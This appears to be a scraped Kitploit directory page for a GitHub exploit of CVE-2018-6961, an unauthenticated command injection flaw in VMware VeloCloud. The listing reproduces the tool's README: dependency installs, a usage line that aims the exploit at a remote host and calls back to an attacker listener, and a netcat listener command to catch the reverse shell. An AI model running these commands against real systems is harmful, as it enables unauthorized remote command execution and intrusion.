Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2018-6961 — veloCloud VMWare - Vulnerability | Kitploit
Tools/GitHubGitHub/bokanrb/cve-2018-6961
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and Control
GitHubbokanrb/cve-2018-6961

CVE-2018-6961

veloCloud VMWare - Vulnerability

View Repository
137 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2018-6961 - UNAUTHENTICATED COMMAND INJECTION VULNERABILITY

This exploit works in Python2.7 - Not tested in any other version

1) Install Dependencies

root@kitploit:~
pip install request

if don't have pip installed, just run

root@kitploit:~
apt-get install python-pip

**2) Usage **

root@kitploit:~
python exployt.py --rhost --interface --lhost --lport --function
root@kitploit:~
python exploit.py --rhost 1.1.1.1 --interface ge1 --lhost 2.2.2.2 --lport 443 --function traceroute
Exploiting...................

3) Don't forget to setup the netcat on another terminal

root@kitploit:~
nc -vlnp 443

TODO --improve the script to run the netcat on the same terminal

Download Tool